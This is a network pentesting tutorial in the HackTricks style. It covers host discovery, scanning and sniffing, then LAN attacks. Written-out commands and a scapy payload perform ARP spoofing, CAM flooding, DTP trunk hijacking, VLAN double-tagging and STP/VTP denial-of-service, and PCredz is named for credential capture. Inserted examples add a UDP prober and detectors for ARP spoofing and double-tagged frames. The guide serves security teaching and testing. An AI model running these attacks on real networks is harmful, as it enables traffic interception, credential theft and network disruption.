
Pentesting Network

Discovering hosts from the outside

This is a brief section about how to find IPs that respond from the Internet.
In this situation you have some scope of IPs (maybe even several ranges) and you just need to find which of those IPs are responding.

ICMP

This is the easiest and fastest way to discover whether a host is up or not.
You could try to send some ICMP packets and expect responses. The easiest way is to send an echo request and wait for the echo reply. You can do that with a simple ping, or with fping for ranges.
You could also use nmap to send other types of ICMP packets (timestamp and address mask requests); this gets past filters that only block the common ICMP echo request/reply.

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

TCP Port Discovery

It is very common to find that all kinds of ICMP packets are being filtered. Then, the only way left to check whether a host is up is to try to find open ports. Each host has 65535 ports, so if you have a large scope you cannot test whether every port of every host is open.
What you need is a fast port scanner (masscan) and a list of the most commonly used ports:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

You could also perform this step with nmap, but it is slower and nmap has some problems identifying which hosts are up.

HTTP Port Discovery

This is just a TCP port discovery that is useful when you want to focus on discovering HTTP services:

masscan -p80,443,8000-8100,8443 199.66.11.0/24

UDP Port Discovery

You could also try to check for some open UDP ports to decide whether you should pay more attention to a host. As UDP services usually don't respond with any data to a regular empty UDP probe packet, it is difficult to say whether a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable one based on the port number:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

The nmap line proposed before tests only the 100 most common UDP ports (that is what -F selects) on every host inside the /24 range, but even that will take more than 20 minutes. If you need faster results you can use udp-proto-scanner:

./udp-proto-scanner.pl 199.66.11.53/24

This will send the following UDP probes to their expected ports (for a /24 range this takes about 1 minute): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike, ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.
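The three-state logic behind the UDP commands above, as an added example that is not HackTricks', nmap's or udp-proto-scanner's own code: it builds a few service-specific probe payloads from the protocol formats (DNS STATUS, NTP client request, SNMPv1 GetRequest for sysDescr.0), sends each one from a connected UDP socket and classifies the port as open (a datagram came back), closed (ICMP port unreachable, surfaced as ECONNREFUSED) or open|filtered (silence). The loopback responder is constructed for the demo and stands in for a real service; the request ID 0x1337 and the `PROBES` table are assumptions for illustration.

```python
"""Three-state UDP port probing with service-specific payloads.

Added example; not HackTricks' or nmap's code. Mirrors the idea behind
`nmap -sU -sV --version-intensity 0` and udp-proto-scanner: an empty datagram
is rarely answered, so send a payload the service usually found on that port
will reply to, then classify the port by what comes back:

  datagram received          -> "open"
  ICMP port unreachable      -> "closed"  (ECONNREFUSED on a *connected* UDP socket)
  nothing before the timeout -> "open|filtered"
"""
import socket
import struct
import threading
from typing import Dict, Tuple


def ber(tag: int, payload: bytes) -> bytes:
    """Minimal BER TLV encoder, short-form length only (payloads < 128 bytes)."""
    if len(payload) >= 128:
        raise ValueError("short-form BER length only")
    return bytes([tag, len(payload)]) + payload


def snmp_get_sysdescr(community: bytes = b"public") -> bytes:
    """SNMPv1 GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0), request-id 1."""
    oid = bytes([0x2B, 6, 1, 2, 1, 1, 1, 0])              # arcs 1.3 pack into 0x2b
    varbind = ber(0x30, ber(0x06, oid) + ber(0x05, b""))  # OID + NULL value
    pdu = ber(0xA0,                                       # GetRequest-PDU
              ber(0x02, b"\x01") + ber(0x02, b"\x00") + ber(0x02, b"\x00")
              + ber(0x30, varbind))
    return ber(0x30, ber(0x02, b"\x00") + ber(0x04, community) + pdu)  # version 0 = v1


# Port -> payload the service on that port is expected to answer (constructed here).
PROBES: Dict[int, bytes] = {
    # DNS header only: ID, flags 0x1000 (opcode 2 = STATUS), all counts zero.
    53: struct.pack("!HHHHHH", 0x1337, 0x1000, 0, 0, 0, 0),
    # NTP client request: LI=0 VN=3 Mode=3 -> first byte 0x1b, then 47 zero bytes.
    123: b"\x1b" + b"\x00" * 47,
    161: snmp_get_sysdescr(),
}


def probe_udp(host: str, port: int, payload: bytes, timeout: float = 1.0) -> str:
    """Send one probe and return "open", "closed" or "open|filtered".

    connect() matters: the kernel only hands an ICMP port-unreachable back to a
    connected UDP socket (as ECONNREFUSED). With sendto() on an unconnected
    socket the error is dropped and a closed port looks filtered.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            s.send(payload)
            s.recv(4096)
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "open|filtered"


def scan_udp(host: str, probes: Dict[int, bytes] = PROBES, timeout: float = 1.0) -> Dict[int, str]:
    """Probe every (port, payload) pair against one host."""
    return {port: probe_udp(host, port, payload, timeout) for port, payload in probes.items()}


def start_responder() -> Tuple[int, threading.Event]:
    """Constructed stand-in service on 127.0.0.1: answers every datagram until stopped."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve() -> None:
        while not stop.is_set():
            try:
                data, peer = srv.recvfrom(4096)
                srv.sendto(b"reply:" + data[:4], peer)
            except socket.timeout:
                continue
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop


def unused_udp_port() -> int:
    """Pick a loopback UDP port nothing listens on (to show the "closed" case)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    port, stop = start_responder()
    print(port, probe_udp("127.0.0.1", port, PROBES[123]))          # open
    print(probe_udp("127.0.0.1", unused_udp_port(), PROBES[53]))   # closed
    stop.set()
```

Against a remote host, the "closed" verdict depends on the ICMP port-unreachable actually reaching you; a firewall that drops ICMP turns every closed port into "open|filtered", which is exactly why scanning the whole UDP range is slow and why only the probes a service will answer give a definite "open".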

SCTP Port Discovery

#Probably useless, but it's pretty fast, so why not try it?
nmap -T4 -sY -n --open -Pn <IP/range>

Pentesting Wifi

Here you can find a nice guide to all the well-known Wifi attacks at the time of writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network, one of the first things you will want to do is discover other hosts. Depending on how much noise you can/want to make, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

Active

Note that the techniques commented in Discovering hosts from the outside (TCP/HTTP/UDP/SCTP Port Discovery) can also be applied here.
But, as you are in the same network as the other hosts, you can do more things:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Active ICMP

Note that the techniques commented in Discovering hosts from the outside (ICMP) can be also applied here.
But, as you are in the same network as the other hosts, you can do more things:

  • If you ping a subnet broadcast address the ping should arrive at each host and they could respond to you: ping -b 10.10.5.255
  • Pinging the network broadcast address you could even find hosts inside other subnets: ping -b 255.255.255.255
  • Use the -PE, -PP, -PM flags of nmap to perform host discovery sending respectively ICMPv4 echo, timestamp, and subnet mask requests: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan is used to turn on computers through a network message. The magic packet used to turn on the computer is only a packet where a MAC Dst is provided and then it is repeated 16 times inside the same packet.
These packets are usually sent in an ethernet frame of type 0x0842 or in a UDP packet to port 9.
If no [MAC] is provided, the packet is sent to the ethernet broadcast address (and the broadcast MAC will be the one being repeated).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
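The magic packet format described above is simple enough to build and validate by hand. The following is an added example (not code from the HackTricks page or from bettercap): it constructs a magic packet exactly as described (six 0xFF sync bytes, then the target MAC repeated 16 times), wraps it in a UDP/9 datagram the way the wol.udp variant does, and on the receiving side extracts which MAC a captured datagram would wake, which is what a monitor would log when unexpected WoL traffic appears on a segment. All MAC addresses and the source port are made up for the demo.

```python
import struct

# Constructed example, not part of the HackTricks page: build and validate the
# Wake-on-LAN "magic packet" (6 x 0xFF sync bytes followed by the target MAC
# repeated 16 times) and the UDP/9 datagram that usually carries it.

SYNC = b"\xff" * 6
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
WOL_UDP_PORT = 9


def mac_to_bytes(mac: str) -> bytes:
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError(f"malformed MAC address: {mac!r}")
    return bytes(int(p, 16) for p in parts)


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_magic_packet(mac: str = BROADCAST_MAC) -> bytes:
    """Sync stream + MAC * 16. With no MAC the broadcast MAC is the one
    repeated, matching what bettercap does when [MAC] is omitted."""
    return SYNC + mac_to_bytes(mac) * 16


def find_magic_packet(payload: bytes):
    """Return the MAC this payload would wake, or None if it carries no valid
    magic packet. The sync stream may be preceded by other bytes (some senders
    prefix the datagram), so every 0xFF run in the payload is tried."""
    idx = payload.find(SYNC)
    while idx != -1:
        body = payload[idx + 6: idx + 6 + 96]
        if len(body) == 96 and body == body[:6] * 16:
            return bytes_to_mac(body[:6])
        idx = payload.find(SYNC, idx + 1)
    return None


def build_udp_wol(mac: str, src_port: int = 40000) -> bytes:
    """Constructed UDP header (checksum zero, which IPv4 permits) in front of
    the magic packet, as the wol.udp variant sends it to port 9."""
    data = build_magic_packet(mac)
    udp = struct.pack("!HHHH", src_port, WOL_UDP_PORT, 8 + len(data), 0)
    return udp + data


def inspect_udp_wol(segment: bytes):
    """Parse a UDP segment and return (dst_port, woken_mac) so a monitor can
    log who is being woken; None when it is not a well-formed WoL datagram."""
    if len(segment) < 8:
        return None
    _src_port, dst_port, length, _csum = struct.unpack("!HHHH", segment[:8])
    if dst_port != WOL_UDP_PORT or length != len(segment):
        return None
    mac = find_magic_packet(segment[8:])
    return (dst_port, mac) if mac else None


if __name__ == "__main__":
    seg = build_udp_wol("00:11:22:33:44:55")
    print(inspect_udp_wol(seg))          # (9, '00:11:22:33:44:55')
    print(find_magic_packet(build_magic_packet()))  # broadcast MAC
```

The search for the sync stream rather than a fixed offset matters in practice: vendors sometimes prepend a password or header to the datagram, and a validator that only checks offset 0 will miss those packets.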

Scanning Hosts

Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions could be performed.

TCP

  • Open port: SYN --> SYN/ACK --> RST
  • Closed port: SYN --> RST/ACK
  • Filtered port: SYN --> [NO RESPONSE]
  • Filtered port: SYN --> ICMP message
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

There are 2 options to scan a UDP port:

  • Send a UDP packet and check for the response ICMP unreachable if the port is closed (in several cases ICMP will be filtered so you won't receive any information about whether the port is closed or open).
  • Send formatted datagrams to elicit a response from a service (e.g., DNS, DHCP, TFTP, and others, as listed in nmap-payloads). If you receive a response, then the port is open.

Nmap will mix both options using "-sV" (UDP scans are very slow), but note that UDP scans are slower than TCP scans:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP Scan

SCTP (Stream Control Transmission Protocol) is designed to be used alongside TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). Its main purpose is to facilitate the transport of telephony data over IP networks, mirroring many of the reliability features found in Signaling System 7 (SS7). SCTP is a core component of the SIGTRAN protocol family, which aims to transport SS7 signals over IP networks.

SCTP is supported by various operating systems, such as IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, and VxWorks, indicating its broad acceptance in the field of telecommunications and networking.

Two different scans for SCTP are offered by nmap: -sY and -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

IDS and IPS evasion

{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}

More nmap options

{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}

Revealing Internal IP Addresses

Misconfigured routers, firewalls, and network devices sometimes respond to network probes using nonpublic source addresses. tcpdump can be utilized to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the eth2 interface, which is accessible from the public Internet. It's important to note that if your setup is behind a NAT or a Firewall, such packets are likely to be filtered out.

tcpdump -nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

Sniffing

By sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or the switching fabric is under stress, attackers can capture sensitive material via passive network sniffing.

If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Of course, you can also capture packets from a remote machine over SSH, with Wireshark as the GUI, in realtime:

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

Obviously.

Capturing credentials

You can use tools like https://github.com/lgandx/PCredz to parse credentials from a pcap or a live interface.

LAN attacks

ARP spoofing

ARP Spoofing consists of sending gratuitous ARP responses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change its ARP table and will contact our machine every time it wants to contact the spoofed IP.

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
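From the defender's side, the attack described above (an IP suddenly claimed by a different MAC in a gratuitous reply) is exactly what an arpwatch-style monitor looks for. The following is an added example, not code from the HackTricks page, bettercap or arpspoof: it parses raw Ethernet/ARP frames with struct, keeps the first IP-to-MAC binding it sees, and reports any later frame in which the same IP is claimed by another MAC. The frame builder and all MACs and IPs are constructed for the demo; a real deployment would seed the binding table from a trusted inventory or DHCP leases rather than from the first frame on the wire.

```python
import socket
import struct

# Constructed example, not part of the HackTricks page: a minimal
# arpwatch-style monitor over raw Ethernet/ARP frames.

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(p, 16) for p in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_frame(src_mac, dst_mac, oper, sha, spa, tha, tpa) -> bytes:
    """Ethernet header + 28-byte IPv4 ARP body (oper 1=request, 2=reply)."""
    eth = mac_to_bytes(dst_mac) + mac_to_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
           + mac_to_bytes(sha) + socket.inet_aton(spa)
           + mac_to_bytes(tha) + socket.inet_aton(tpa))
    return eth + arp


def parse_arp_frame(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not a
    well-formed Ethernet/IPv4 ARP packet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "oper": oper,
        "sha": bytes_to_mac(frame[22:28]), "spa": socket.inet_ntoa(frame[28:32]),
        "tha": bytes_to_mac(frame[32:38]), "tpa": socket.inet_ntoa(frame[38:42]),
        # a reply whose sender IP equals its target IP is gratuitous
        "gratuitous": oper == ARP_REPLY and frame[28:32] == frame[38:42],
    }


class ArpWatch:
    """Keep the first IP->MAC binding seen and report later conflicts.
    The baseline is deliberately not overwritten, so a spoofer that keeps
    re-announcing the gateway IP keeps generating alerts."""

    def __init__(self):
        self.bindings = {}

    def observe(self, frame: bytes):
        arp = parse_arp_frame(frame)
        if arp is None:
            return None
        ip, mac = arp["spa"], arp["sha"]
        known = self.bindings.setdefault(ip, mac)
        if known == mac:
            return None
        if arp["gratuitous"]:
            kind = "gratuitous reply"
        elif arp["oper"] == ARP_REPLY:
            kind = "reply"
        else:
            kind = "request"
        return f"{ip} claimed by {mac} in {kind}; baseline is {known}"


def run_demo():
    """Constructed traffic: a legitimate gateway reply, then a spoofer
    claiming the gateway IP twice. Returns the alerts raised."""
    gw_mac, gw_ip = "aa:aa:aa:aa:aa:01", "192.168.1.1"
    victim_mac, victim_ip = "aa:aa:aa:aa:aa:02", "192.168.1.2"
    spoofer = "66:66:66:66:66:66"
    frames = [
        build_arp_frame(gw_mac, victim_mac, ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),
        build_arp_frame(spoofer, victim_mac, ARP_REPLY, spoofer, gw_ip, victim_mac, victim_ip),
        build_arp_frame(spoofer, BROADCAST, ARP_REPLY, spoofer, gw_ip, BROADCAST, gw_ip),
    ]
    watch = ArpWatch()
    return [a for a in map(watch.observe, frames) if a]


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

On a real host the frames would come from a raw socket or a pcap; the parser only needs the 42 bytes of Ethernet + ARP header, so padding to the 60-byte minimum frame size is harmless.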

MAC Flooding - CAM overflow

Overflow the switch's CAM table by sending a lot of packets with different source MAC addresses. When the CAM table is full, the switch starts behaving like a hub (broadcasting all the traffic).

macof -i <interface>

802.1Q VLAN / DTP Attacks

Dynamic Trunking

Dynamic Trunking Protocol (DTP) is designed as a link layer protocol to facilitate an automatic system for trunking, allowing switches to automatically select ports for trunk mode (Trunk) or non-trunk mode. The deployment of DTP is often seen as indicative of suboptimal network design, underscoring the importance of manually configuring trunks only where necessary and ensuring proper documentation.

By default, switch ports are set to operate in Dynamic Auto mode, meaning they are ready to initiate trunking if prompted by a neighboring switch. A security concern arises when a pentester or attacker connects to the switch and sends a DTP Desirable frame, compelling the port to enter trunk mode. This action enables the attacker to enumerate VLANs through STP frame analysis and circumvent VLAN segmentation by setting up virtual interfaces.

The presence of DTP in many switches by default can be exploited by adversaries to mimic a switch's behavior, thereby gaining access to traffic across all VLANs. The script dtpscan.sh is used to monitor an interface, revealing whether a switch is in Default, Trunk, Dynamic, Auto, or Access mode, the latter being the only configuration immune to VLAN hopping attacks. This tool assesses the switch's vulnerability status.

Should a network vulnerability be identified, the Yersinia tool can be employed to "enable trunking" via the DTP protocol, allowing for the observation of packets from all VLANs.

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

You can also use the DTPHijacking.py script to generate DTP Desirable frames. Once the switch receives them, the port is switched into trunk mode.

sudo python3 DTPHijacking.py --interface eth0

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Once you know the VLAN IDs (enumerated from the STP frames, as noted above), configure a virtual interface for the target VLAN and get an address in it:

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

The discussed attack of Dynamic Trunking, creating virtual interfaces and discovering hosts inside other VLANs is automatically performed by the tool: https://github.com/nccgroup/vlan-hopping---frogger

Double Tagging

If an attacker knows the value of the MAC, IP and VLAN ID of the victim host, he could try to double tag a frame with its designated VLAN and the VLAN of the victim and send a packet. As the victim won't be able to connect back with the attacker, the best option for the attacker is to communicate via UDP to protocols that can perform some interesting actions (like SNMP).

Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through the Internet). Then, the attacker could sniff on the second host he owns to see whether it receives any packets from the victim.

To perform this attack you could use scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)
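The frame the scapy snippet above produces has a recognisable shape on the wire: two consecutive 802.1Q tags, the outer one carrying the native VLAN of the trunk. That shape should never arrive from a host on an access port, which makes it a cheap detection. The following is an added example, not code from the HackTricks page or from scapy: it walks the 802.1Q tag stack of a raw Ethernet frame and classifies frames that a defender would consider suspicious on an access port. The frame builder, MACs, VLAN IDs and the native_vlan parameter are constructed for the demo.

```python
import struct

# Constructed example, not part of the HackTricks page: parse the 802.1Q tag
# stack of raw Ethernet frames and flag double-tagged ones.

ETH_P_8021Q = 0x8100
ETH_P_8021AD = 0x88A8          # QinQ service tag, also a valid outer tag
VLAN_ETHERTYPES = {ETH_P_8021Q, ETH_P_8021AD}
ETH_P_IP = 0x0800


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(p, 16) for p in mac.split(":"))


def build_frame(dst_mac, src_mac, vlans, ethertype=ETH_P_IP, payload=b"\x00" * 46) -> bytes:
    """Ethernet header with zero or more 802.1Q tags, outermost first.
    PCP and DEI bits are left at zero; only the 12-bit VID is set."""
    hdr = mac_to_bytes(dst_mac) + mac_to_bytes(src_mac)
    for vid in vlans:
        hdr += struct.pack("!HH", ETH_P_8021Q, vid & 0x0FFF)
    return hdr + struct.pack("!H", ethertype) + payload


def vlan_stack(frame: bytes):
    """Return (vlan_ids_outer_first, inner_ethertype), or None when the
    frame is truncated inside the header."""
    off, tags = 12, []
    while True:
        if off + 2 > len(frame):
            return None
        ethertype = struct.unpack("!H", frame[off:off + 2])[0]
        if ethertype not in VLAN_ETHERTYPES:
            return tags, ethertype
        if off + 4 > len(frame):
            return None
        tci = struct.unpack("!H", frame[off + 2:off + 4])[0]
        tags.append(tci & 0x0FFF)
        off += 4


def classify(frame: bytes, native_vlan: int = 1):
    """Describe why a frame is suspicious on an access port, or None.
    native_vlan is the untagged VLAN of the uplink trunk (assumed 1 here);
    a double tag whose outer VID equals it is the classic VLAN-hopping shape,
    because the first switch strips that outer tag and forwards the inner one."""
    parsed = vlan_stack(frame)
    if parsed is None:
        return "truncated frame"
    tags, _inner = parsed
    if len(tags) >= 2:
        shape = " -> ".join(str(t) for t in tags)
        if tags[0] == native_vlan:
            return f"double-tagged via native VLAN {native_vlan}: {shape}"
        return f"stacked 802.1Q tags (QinQ?) on access port: {shape}"
    if len(tags) == 1:
        return f"tagged frame (VLAN {tags[0]}) on access port"
    return None


if __name__ == "__main__":
    hop = build_frame("aa:aa:aa:aa:aa:10", "66:66:66:66:66:66", [1, 20])
    print(vlan_stack(hop))   # ([1, 20], 2048)
    print(classify(hop))     # double-tagged via native VLAN 1: 1 -> 20
```

The single-tag case is reported at lower severity on purpose: a voice VLAN or a misbehaving hypervisor can legitimately send tagged frames into an access port, whereas two tags with the native VLAN outermost almost never have an innocent explanation.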

Lateral VLAN Segmentation Bypass

If you have access to a switch that you are directly connected to, you have the ability to bypass VLAN segmentation within the network. Simply switch the port to trunk mode (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.

{% content-ref url="lateral-vlan-segmentation-bypass.md" %} lateral-vlan-segmentation-bypass.md {% endcontent-ref %}

Layer 3 Private VLAN Bypass

In certain environments, such as guest wireless networks, port isolation (also known as private VLAN) settings are implemented to prevent clients connected to a wireless access point from directly communicating with each other. However, a technique has been identified that can circumvent these isolation measures. This technique exploits either the lack of network ACLs or their improper configuration, enabling IP packets to be routed through a router to reach another client on the same network.

The attack is executed by crafting a packet that carries the destination IP address of the target client but with the router's MAC address. This causes the router to mistakenly forward the packet to the target client. This approach is similar to that used in Double Tagging Attacks, where the ability to control a host accessible to the victim is used to exploit the security flaw.

Key Steps of the Attack:

  1. Crafting a Packet: A packet is specially crafted to include the target client's IP address but with the router's MAC address.
  2. Exploiting Router Behavior: The crafted packet is sent to the router, which, due to its configuration, redirects the packet to the target client, bypassing the isolation provided by the private VLAN settings.

VTP Attacks

VTP (VLAN Trunking Protocol) centralizes VLAN management. It utilizes revision numbers to maintain VLAN database integrity; any modification increments this number. Switches adopt configurations with higher revision numbers, updating their own VLAN databases.

VTP Domain Roles

  • VTP Server: Manages VLANs: creates, deletes, modifies. It broadcasts VTP announcements to domain members.
  • VTP Client: Receives VTP announcements to synchronize its VLAN database. This role is restricted from local VLAN configuration modifications.
  • VTP Transparent: Doesn't engage in VTP updates but forwards VTP announcements. Unaffected by VTP attacks, it maintains a constant revision number of zero.

VTP Advertisement Types

  • Summary Advertisement: Broadcasted by the VTP server every 300 seconds, carrying essential domain information.
  • Subset Advertisement: Sent following VLAN configuration changes.
  • Advertisement Request: Issued by a VTP client to request a Summary Advertisement, typically in response to detecting a higher configuration revision number.

VTP vulnerabilities are exploitable exclusively via trunk ports, as VTP announcements circulate solely through them. Post-DTP attack scenarios might pivot towards VTP. Tools like Yersinia can facilitate VTP attacks, aiming to wipe out the VLAN database and effectively disrupting the network.

Note: This discussion pertains to VTP version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

STP Attacks

If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.

STP BPDU DoS

By sending a lot of BPDUs, either TCP (Topology Change Notification) or Conf (the BPDUs sent when the topology is created), the switches become overloaded and stop working correctly.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you continuously send this kind of packets, the CAM table will be restarted continuously (or every 15 seconds) and when it is restarted, the switch behaves as a hub.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

STP Root Attack

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behave as a switch but it will not be root

If the attacker is connected to 2 switches, he can become the root of the new tree and all the traffic between those switches will pass through him (a MITM attack is performed).

